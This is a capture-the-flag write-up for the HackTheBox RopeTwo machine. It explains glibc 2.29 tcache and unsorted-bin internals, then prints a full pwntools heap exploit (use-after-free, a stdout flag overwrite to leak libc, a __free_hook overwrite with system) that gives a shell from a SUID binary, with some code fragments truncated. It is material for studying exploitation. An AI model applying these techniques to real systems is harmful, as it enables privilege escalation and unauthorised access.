My previous article, Secrets of V8 Engine, describes the exploitation of a vulnerability intentionally left in the V8 Engine. As a result, you get a shell, but to advance further and capture the user flag, you have to solve a new complicated task: exploit the existing memory management vulnerabilities.
Intelligence collection
I connect to the VM over SSH and run a script that searches for privilege escalation vulnerabilities. Personally, I prefer to use LinPEAS for this purpose.
artex@kali:/home/artex/HTB/RopeTwo# ssh -i key chromeuser@10.10.10.196artex@kali:/home/artex/HTB/RopeTwo# scp -i ssh/key linpeas.sh chromeuser@10.10.10.196:/tmpchromeuser@rope2:/tmp$ chmod +x linpeas.shchromeuser@rope2:/tmp$ ./linpeas.sh > linpeas.txtartex@kali:/home/artex/HTB/RopeTwo# scp -i ssh/key chromeuser@10.10.10.196:/tmp/linpeas.txt linpeas.txt
The report has to be thoroughly examined line-by-line. In the “Interesting Files – SUID” section, I see a file called rshell
.
Let’s see how it works.
Apparently, this is a restricted shell with SUID bit; it definitely deserves closer attention. I download rshell
and unleash Ghidra on it. Instead of providing the full disassembled code listing, I created a simplified diagram showing the main logic of rshell
functions.
It turns out that this not a restricted shell, but just its emulation. Only a few commands are available: add
, edit
, rm
, ls
, echo
, id
, and whoami
. The first four of them (in fact, only three, see below) are of utmost interest. These commands allow to create, modify, delete, and display objects (“files”) and allocate respective memory chunks having certain size (no more than 112 bytes) and storing certain content. Furthermore, the ls
command displays only file names, not their content. In other words, everything indicates that my only option is heap exploitation.
Plenty of information on this topic is available on the Internet. If you are interested in it, I strongly recommend to visit the website of Dhaval Kapil. Going back to RopeTwo, first of all, I have to find in the code vulnerabilities that can be exploited.
At a first glance, the code doesn’t contain any obvious errors. The functions seem to be safe, size checks are in place, and input is terminated with zero. I spent plenty of time before locating a Use-After-Free (UAF) vulnerability.
For more information on UAF, see the Orange Cyberdefense blog.
Environment setup
I will write the exploit using pwntools
, a handy Python library specially designed for this purpose. First of all, I have to set up the environment. In addition to rshell
, I download from RopeTwo glibc
(a standard C library implementing system calls and basic functions like malloc
, open
, and printf
) and the ld
dynamic linking library. They are required for full version compatibility (new glibc
releases often contain changes that fix vulnerabilities, and it’s crucial for my purposes that offsets of all functions are the same). Below is a table listing glibc versions and various heap exploitation techniques suitable for them.
As you can see, the server uses libc
version 2.29.
So, I have to find on the Internet and download libc
version 2.29 with debugging symbols; otherwise, it would be very difficult to write an exploit. I have no doubt that you can handle this quest.
Next, I patch rshell
using the command patchelf
so that it uses the right linker version.
To launch rshell
with the right libc
version, I use the following command:
LD_PRELOAD='libc-2.29.so' rshell
The checksec
output looks scary: all protective mechanisms are enabled. But I accept the challenge!
- Full RELRO. The Global Offset Table (GOT) is read-only. This means that I cannot overwrite a function pointer in it to alter the program flow.
- Canary found. The stack contains a ‘canary’ (i.e. a certain value; if it’s overwritten, this indicates that the stack was altered); accordingly, stack overflow attacks are impossible (unless I find a way to gain control over the ‘canary’).
- NX enabled. There are no memory areas allowing simultaneous writing and execution (RWX). Accordingly, I cannot inject a shellcode into the address space and execute it.
- PIE enabled. PIE means Position Independent Executable: the basic address of the executable file changes every time it’s launched; accordingly, I cannot use ROP and ret2libc without a leak.
First of all, I must write auxiliary functions emulating user input.
def add(name, size, content="A"): io.sendlineafter('$ ', 'add '+str(name)) io.sendlineafter('size: ', str(int(size))) io.recvuntil("content: ") io.sendline(content)def edit(name, size, content="A"): io.sendlineafter('$ ', 'edit '+str(name)) io.sendlineafter('size: ', str(int(size))) if int(size) != 0: io.recvuntil("content: ") io.send(content)def rm(name): io.sendlineafter('$ ', 'rm '+str(name))
Important: I cannot use io.
in the add
function as I use it in the edit
function: add
uses fgets
to write content, while edit
uses read
. Therefore I have no choice but to use the io.
method that adds a line break (and some headache, see below) in the end.
Heap, bins, and chunks
Memory bins are used to store freed memory chunks. Strictly speaking, a bin is a list (doubly- or singly-linked one) of free (i.e. nonallocated) chunks. Its main purpose is to quickly allocate memory sections (according to the statistics, programs frequently allocate and clear memory chunks of the same size). The linkage type used by a specific list depends on the bin the free chunk gets into. This, in turn, depends on the chunk size that increases in multiples of 16 bytes (0x20 → 0x30 → 0x40…). Accordingly, the least significant 4 bits in the chunk size field are not used. Instead, they contain chunk status flags:
-
PREV_INUSE
– means that the previous chunk is in use (and vice versa: if this flag isn’t set, the previous chunk is not in use); -
IS_MMAPPED
– means that the chunk has been allocated viammap(
; and) -
NON_MAIN_ARENA
– means that the chunk doesn’t belong to the main arena.
Arena is a structure of the malloc
function containing bins for freed chunks.
The maximum number of arenas for a process is limited by the number of processor cores available to this process.
Currently, there are five types of bins (the figures are provided for 64-bit apps).
- Tcache bin (introduced in glibc 2.26) stores any chunks less or equal to 0x410 bytes; 64 singly-linked lists per each arena. Each Tcache bin stores chunks of the same size. Each Tcache bin can store up to seven free chunks.
- Fast bin stores any chunks less or equal to 0x0b bytes; 10 singly-linked lists 0x20 to 0xb0 bytes in size per each arena.
- Unsorted bin is a doubly-linked list that may contain chunks of any size. Each arena has only one such list. When memory is allocated, the following bins are checked for free chunks prior to the unsorted bin: tcache, fastbin, and smallbin. The large bin is checked last.
- Small bin is a collection of 62 doubly-linked lists 0x20 to 0x3f0 bytes in size per each arena (overlaps with fastbins by the size range).
- Large bin is a collection of 62 doubly-linked lists per each arena; each of these lists contains chunks whose size falls into a certain range (e.g. 0x400 largebin contains chunks 0x400-0x430 bytes in size).
For illustration purposes, below is simple code that creates and clears two chunks 0x30 bytes each.
add(0, 0x28)add(1, 0x28)rm(0)rm(1)
Let’s check how it looks in GDB. As you can see, both chunks ended up in tcachebin 0x30. The tcachebin structure is shown on the screenshot below.
The scheme of a singly-linked list is as follows.
A doubly-linked list scheme is shown below (for small bins, the Size is the same; while for large bins, the fd_nextsize
and bk_nextsize
pointers are added).
fd
points to the next chunk on the list, while bk
, on the previous one.
Writing exploit
Done with theory; now let’s try to write an arbitrary write primitive using UAF. Important: I cannot use the Tcache Dup (Double Free) technique because glibc 2.29 includes protection against it.
Good news is that instead of Double
, I can use realloc
with zero size. An example of such code is shown below:
--skip--
def debug(breakpoints):
script_noaslr= ”’
set verbose on
break *0x555555555656
commands
silent
tcachebins
continue
end
continue
”’
gdb.attach(io,gdbscript=script_noaslr)
TARGET=p64(0x55555555a3f0)
VALUE=p64(0xdeadbeef)
add(‘A’, 0x28)
edit(‘A’, 0) # Place chunk into tcachebin 0x30
io.sendlineafter(‘ ‘, ‘ls’) # Display tcachebins listing
edit(‘A’, 0x28, TARGET) # Write the target address to the ’empty’ chunk replacing the fd pointer
io.sendlineafter(‘ ‘, ‘ls’) # Now tcachebins contain two chunks, and one of them points to TARGET
add(‘B’, 0x28) # ‘Take’ from the bin the last chunk in the chain
edit(‘B’, 0x38) # Increase the chunk B size and clear it
rm(‘B’)
edit(‘A’,0x48) # Increase the chunk A size and clear it
rm(‘A’)
io.sendlineafter(‘$ ‘, ‘ls’) # There are three tcachebins, and 0x30 points to TARGET
add(‘A’, 0x28, VALUE) # Allocate the chunk 0x30 in size, thus, writing VALUE to TARGET--skip--
I insert this fragment into my script and run it: ./
.
The first parameter disables ASLR (Address Space Layout Randomization), while the second one launches GDB.
To display the output of tcachebins
in pwndbg
in the key points, I bind it to the address of the ls
function (0x555555555656
). In other words, every time ls
is called, the debugger will display information on tcachebins
.
Success! The value at 0x55555555a3f0 has been overwritten!
Now that I have an arbitrary write primitive, I have to figure out how to use it (leaping ahead, I must say that the primitive will be modified in the final exploit because I am limited to two files). The standard action plan is as follows: leak the address of the libc library, use the offset to calculate its base address, and then substitute the call of some hook with one_gadget
or with a system call if one_gadget
doesn’t work (i.e. the conditions for its call aren’t met).
At this stage, it’s normally possible to check the libc address in /
and start writing the exploit. Too bad, this trick doesn’t work on a virtual machine: if a binary is launched with SUID bit, the memory map of the process won’t be available for reading.
And the question is: how to leak the libc address if all the protection mechanisms in the binary are enabled and there are no obvious vulnerabilities in the code? Especially taking that I am limited to two chunks up to 70 bytes each! At first glance, the task seems to be impossible… To find a solution, I have to spend long hours searching on the Internet.
The idea is as follows: create a fake unsorted bin and brute-force the 4 bits in the pointer to stdout. But let’s not run ahead.
First, I have to increase the chunk size to more than 420 bytes, so that the chunk goes to unsorted bin after clearing. The reason why the unsorted bin is so important is that fd
and bk
contain pointers to libc (main arena + offset). This is how I can gain access to the libc address space bypassing PIE and ASLR!
Then I can substitute the last two bytes in this address so that it points to stdout. Because of ASLR, the offset is different at each start, but fortunately, by only 4 bits! So, the main question is: how to make stdout display the libc address?
A thorough examination of the source code brings the following information.
When puts
is called, the _IO_new_file_overflow
function is called using the following chain: _IO_puts
→ _IO_sputn
→ _IO_new_file_xsputn
→ _IO_new_file_overflow
. In _IO_new_file_overflow
, the _IO_do_write
call, that is defined as a macro of the _IO_new_do_write
function, is of utmost interest. If the flags indicate that the buffer isn’t empty, then the buffer value (_IO_write_base
points to the buffer beginning; _IO_write_ptr
, to its end) is printed in stdout. Therefore, if I change the _IO_2_1_stdout_
flags in the right way, I will be able to leak the libc address!
Sounds like a plan, let’s try to implement it. My first objective is to ensure that the chunk goes to the unsorted bin. But how? After all, I am limited to 0x70 bytes!
So, I have to create a fake big chunk! First of all, I prepare auxiliary chunks:
add(0, 0x68)edit(0, 0, "") # tcache 0x70edit(0, 0x18) # tcache 0x50 (0x70-0x20)rm(0) # tcache 0x20add(0, 0x48)edit(0, 0, "") # tcache 0x50edit(0, 0x48, "C"*0x10) # Rewriting fd and bk pointers to avoid the double free checkrm(0)
As a result of these manipulations with tcache, the chunks are now superimposed on one another.
Now I can change the size of my fake chunk:
add(0, 0x48) # Take one tcache 0x50 from the binadd(1, 0x68, b"C"*0x18+p64(0x451)) # Take tcache 0x70 and write 0x451 in the Size field of the fake chunkrm(1)
Terrific! The size of tcache 0x50 has been changed to 0x450. Now I have to allocate enough memory and free it.
# Allocate 0x400+ bytes for the unsorted binfor i in range(9): add(1, 0x28) edit(1, 0x70) rm(1)# After that, an unsorted bin is created, and its fd points to the main_arena + 96# Since the chunks are superimposed on one another, this fd pointer coincides with fd pointer of tcache 0x50edit(0, 0, "")# Partially overwrite the fd pointer to get to stdout (brute-force 4 bits)edit(0, 0x38, p16(0x7750))
As a result, I get the following picture:
The beginning of IO_2_1_stdout
looks as follows:
Almost done! I take the extra chunk from tcache 0x50 and write the payload to stdout-0x10 (with some luck, the chance is 1/16). A few words about the payload: I need to write a string of 16 bytes before stdout
to pass this string to system (
as a parameter, so I use the opportunity to do this now. Then I have to the write the value of _flags
. To trick the _IO_new_do_write
function, I will need the following flags defined in libio.
:
#define _IO_MAGIC 0xFBAD0000 /* Magic number */...#define _IO_CURRENTLY_PUTTING 0x800#define _IO_IS_APPENDING 0x1000
So, I write the value 0xfbad1800
in the _flags
field of _IO_2_1_stdout
: as a result, _IO_new_do_write
thinks that the buffer isn’t empty. The next three qwords (i.e. IO_read
pointers) must be empty, but I write the "leak:
string to _IO_read_base
to simplify future searches for the required address. The rjust
function aligns the "leak:
string right; as a result, the address of _IO_write_base
goes immediately after it. The first parameter of the function is the width of the alignment borders; the second one is the character to fill in empty spaces (by default, it’s the space character). Why the width of the alignment borders is 7 and not 8? Remember I mentioned earlier that the add
function uses fgets
and adds a line break at the end? That’s why I have to make a 1-byte adjustment.
add(1, 0x48) # Take the extra tcache 0x50 from the binedit(1, 0x18)rm(1)edit(0, 0x18, "C"*0x10)rm(0)add(0, 0x48, b"/bin/sh\x00"+b"\x00"*8+p64(0xfbad1800)+p64(0)*2+b"leak:".rjust(7, b"\x00"))
Finally, I get to the required address (_IO_2_1_stdout_
– 0x10), and the picture is as follows:
0x15555551e750 <_IO_2_1_stderr_+208>: 0x0068732f6e69622f ("/bin/sh") 0x00000000000000000x15555551e760 <_IO_2_1_stdout_>: 0x00000000fbad1800 (flags) 0x00000000000000000x15555551e770 <_IO_2_1_stdout_+16>: 0x0000000000000000 0x0a3a6b61656c0000 ("leak:\n")0x15555551e780 <_IO_2_1_stdout_+32>: 0x000015555551e700 (_IO_write_base) 0x000015555551e7e30x15555551e790 <_IO_2_1_stdout_+48>: 0x000015555551e7e3 0x000015555551e7e30x15555551e7a0 <_IO_2_1_stdout_+64>: 0x000015555551e7e4 0x0000000000000000
Because the add
function in rhsell
uses puts
, the much-desired libc address (_IO_write_base_
) immediately leaks into my hands!
Now all I have to do is calculate the required offsets (to be specific, I have to compute only libc_base
, and pwntools will automatically do the rest of work!), replace __free_hook
with system
using UAF, and call memory cleanup with the "/
parameter (which has already been taken care of).
The full exploit listing with comments is provided below.
But now I have to figure out how to connect my exploit to rshell and automate the process. For this purpose, pwntools offers a great tool called SSH tube.
SSH tube allows to connect to the server over SSH and exploit the target process using Python. But the problem is that there is no Python 2 on the RopeTwo server, while pwntools supports only it by default. So, I have no choice but do some tinkering…
First, I locate on my PC the file ../
, find in it the string listing the Python interpreters, and add python3
to it:
script = 'for py in python2.7 python2 python python3; do test -x "$(which $py 2>&1)" && exec $py -c %s check; done; echo 2' % sh_string(script)
Another problem is that rshell freezes on a regular basis when brute-forcing fails; so, I am going to restart brute-forcing at certain time intervals using signal
.
info
A signal is an asynchronous notification sent to a Linux process to notify it of an event. In this particular case, I need SIGALRM, a signal that is sent to a process when the previously specified time limit elapses. For more information, see the respective Wikipedia article.
Below is the final exploit code:
#!/usr/bin/env python3from pwn import *import signal# Auxiliary function to restart frozen shelldef handler(signum, frame): log.warning("Game over, rshell freezes") io.close()# Base settingscontext(os="linux", arch="amd64")localfile = "./rshell"locallibc = "./libc-2.29.so"pf = lambda name,num :log.info(name + ": 0x%x" % num)elf = ELF(localfile)libc = ELF(locallibc)io = process(localfile, env={'LD_PRELOAD': locallibc}, timeout=1)# Debugging functiondef debug(breakpoints): script= '''continue''' gdb.attach(io,gdbscript=script)# Auxiliary functionsdef add(name, size, content="A"): io.sendlineafter('$ ', 'add '+str(name)) io.sendlineafter('size: ', str(int(size))) io.recvuntil("content: ") io.sendline(content)def edit(name, size, content="A"): io.sendlineafter('$ ', 'edit '+str(name)) io.sendlineafter('size: ', str(int(size))) if int(size) != 0: io.recvuntil("content: ") io.send(content)def rm(name): io.sendlineafter('$ ', 'rm '+str(name))def exp(): # Start timer (25 s) signal.alarm(25) add(0, 0x68) # Create auxiliary tcache bins edit(0, 0, "") # tcache 0x70 edit(0, 0x18) # tcache 0x50 (0x70-0x20) rm(0) # tcache 0x20 add(0, 0x48) # Create fake chunk edit(0, 0, "") # tcache 0x50 edit(0, 0x48, "C"*0x10) # Overwrite fd and bk pointers to avoid the double free check rm(0) add(0, 0x48) # Take one tcache 0x50 from the bin add(1, 0x68, b"C"*0x18+p64(0x451)) # Take tcache 0x70 and write 0x451 in the Size field of the fake chunk rm(1) # Allocate 0x400+ bytes for the unsorted bin to bypass the prev_inuse check in the free() function for i in range(9): add(1, 0x28) edit(1, 0x70) # Despite being limited to 0x70, I get a chunk 0x80 rm(1) # After that, an unsorted bin is created, and its fd points to main_arena + 96 # Since the chunks are superimposed on one another, this fd pointer coincides with fd pointer of tcache 0x50 edit(0, 0, "") # Partially overwrite the fd pointer to get to stdout (brute-force 4 bits) edit(0, 0x38, p16(0x7750)) # Take the extra tcache 0x50 from the bin add(1, 0x48) edit(1, 0x18) rm(1) edit(0, 0x18, "C"*0x10) # Overwrite fd and bk pointers to avoid the double free check rm(0) # Write the leaked address of _IO_write_base to stdout add(0, 0x48, b"/bin/sh\x00"+b"\x00"*8+p64(0xfbad1800)+p64(0)*2+b"leak:".rjust(7, b"\x00")) # If the resultant string doesn't contain "leak:", try again if len(io.recvuntil("leak:")) == 0: log.debug("failed") return # The address is found; calculate the offset of libc_base (it's different in different libc versions) leak_addr=u64(io.recv(8)[1:7]+b'\x00'*2) pf("leak_addr", leak_addr) libc_base = leak_addr - (0x15555551d700-0x155555338000) #REAL #libc_base = leak_addr - (0x7ffff7fc7700 - 0x7ffff7c15000) #DEBUG libc.address = libc_base pf("libc_base", libc_base) # Repeat the superimposition trick (tcache 0x60 is nested into tcache 0x80) add(1, 0x70) # Despite being limited to 0x70, I get a chunk 0x80 in size edit(1, 0, "") edit(1, 0x18, "C"*0x10) # Overwrite fd and bk pointers to avoid the double free check rm(1) # Write the pointer to __free_hook into fd of tcache 0x60 add(1, 0x70, b"C"*0x18+p64(0x61)+p64(libc.sym["__free_hook"])) rm(1) # Take the extra tcache 0x60 from the bin add(1, 0x58) edit(1, 0x28) rm(1) # Overwrite __free_hook with system add(1, 0x58, p64(libc.symbols["system"])) # Delete the 0 file that points to '/bin/sh\x00'. As a result, I get system("/bin/sh")! rm(0) signal.alarm(0) # Reset the timer io.interactive() # Switch to the interactive modeif not args.REMOTE and args.GDB: debug([])signal.signal(signal.SIGALRM, handler)# Brute-force loopwhile True: try: print("----------------------------------------------------------") #io = process(localfile, env={'LD_PRELOAD': locallibc}, timeout=10) # - local #l = listen(31337) # For remote connection and debugging #io = l.wait_for_connection() s = ssh(host='10.10.10.196', user='chromeuser',keyfile='ssh_key') io = s.process("/usr/bin/rshell") exp() except Exception: io.close()
The brute-force procedure normally takes 3-4 minutes. At the end, you get the much-desired shell running on behalf of the user r4j! Finally, this incredibly difficult flag is yours! Or not yet?!
[
[
[
[
[
$
uid=1000(
$
/
$
$
total 40
drwx—— 6 r4j r4j 4096 Jun 1 2020 .
drwxr-xr-x 4 root root 4096 Feb 5 2020 ..
lrwxrwxrwx 1 root root 9 Feb 23 2020 .bash_history → /dev/null
-rwx—— 1 r4j r4j 220 Apr 4 2019 .bash_logout
-rwx—— 1 r4j r4j 88 Apr 21 19:56 .bashrc
drwx—— 2 r4j r4j 4096 Feb 23 2020 .cache
drwx—— 2 r4j r4j 4096 May 27 2020 .config
drwx—— 3 r4j r4j 4096 Feb 23 2020 .gnupg
-rwx—— 1 r4j r4j 807 Apr 4 2019 .profile
drwx—— 2 r4j r4j 4096 Dec 21 19:47 .ssh
-rw-r—– 1 root r4j 33 Dec 21 14:08 user.txt$
cat: user.txt: Permission denied
Hmm, another puzzle: only root and a user from the r4j
group can read the flag, while my gid is still chromeuser
!
I assume that you can solve this problem by yourself; it’s not really difficult. Good luck!
(ʞuıʃɯʎs :ʇuıɥ)
www
- LinPEAS – Linux Privilege Escalation Awesome Script (GitHub)
- Ghidra (GitHub)
- Investigation of x64 glibc heap exploitation techniques on Linux (Матиас Рёрвик, PDF)
- Heap Exploitation (Дхавал Капил)
- Linux Heap Exploitation Intro Series: Used and Abused – Use After Free (Orange Cyberdefense)
- pwntools